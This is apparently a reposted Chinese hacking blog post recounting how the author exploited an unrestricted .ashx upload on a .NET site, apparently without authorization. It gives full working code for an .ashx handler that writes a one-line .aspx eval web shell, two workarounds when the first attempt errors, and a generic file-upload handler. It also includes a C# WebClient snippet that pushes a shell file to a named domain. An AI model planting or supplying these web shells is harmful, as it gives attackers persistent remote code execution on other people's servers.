Author:Pnig0s1992
某站,.Net环境,上传处未限制Ashx和Asmx,后者上传无法运行,提示Asmx脚本只能在本地运行,于是打算先传个Ashx脚本然后在当前目录下生成Aspx文件(目标不能执行Asp文件),
网上找到如下Ashx代码:
- <%@ WebHandler Language="C#" Class="Handler" %>
- using System;
- using System.Web;
- using System.IO;
- public class Handler : IHttpHandler {
- public void ProcessRequest (HttpContext context) {
- context.Response.ContentType = "text/plain";
- StreamWriter file1= File.CreateText(context.Server.MapPath("root.aspx"));
- file1.Write("<%@ Page Language=\"Jscript\"%><%eval(Request.Item[\"pass\"],\"unsafe\");%>");
- file1.Flush();
- file1.Close();
- }
- public bool IsReusable {
- get {
- return false;
- }
- }
- }
我将脚本中的Asp一句话改成菜刀的Aspx一句话~不过执行的时候爆错,说未知指令@Page。遂采用一下2种方式解决:
1,用String连接字符串
- <%@ WebHandler Language="C#" Class="Handler" %>
- using System;
- using System.Web;
- using System.IO;
- public class Handler : IHttpHandler {
- public void ProcessRequest (HttpContext context) {
- context.Response.ContentType = "text/plain";
- string show="<% @Page Language=\"Jscript\"%"+"><%eval(Request.Item"+"[\"chopper\"]"+",\"unsafe\");%>";
- StreamWriter file1= File.CreateText(context.Server.MapPath("root.aspx"));
- file1.Write(show);
- file1.Flush();
- file1.Close();
- }
- public bool IsReusable {
- get {
- return false;
- }
- }
- }
2.比较笨的方法,看代码吧
- <%@ WebHandler Language="C#" Class="Uploader" %>
- using System;
- using System.IO;
- using System.Web;
- public class Uploader : IHttpHandler
- {
- public void ProcessRequest(HttpContext hc)
- {
- foreach (string fileKey in hc.Request.Files)
- {
- HttpPostedFile file = hc.Request.Files[fileKey];
- file.SaveAs(Path.Combine(hc.Server.MapPath("."), file.FileName));
- }
- }
- public bool IsReusable
- {
- get { return true; }
- }
- }
然后用VS建立WinForm程序~主函数里写:
- System.Net.WebClient myWebClient = new System.Net.WebClient();
- myWebClient.UploadFile("http://www.xcnzz.com/Uploader.ashx", "POST", "C:\\ma.aspx");
执行就可以了~以上方法均测试成功~
P.S:Thx from T00ls.
本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/495155,如需转载请自行联系原作者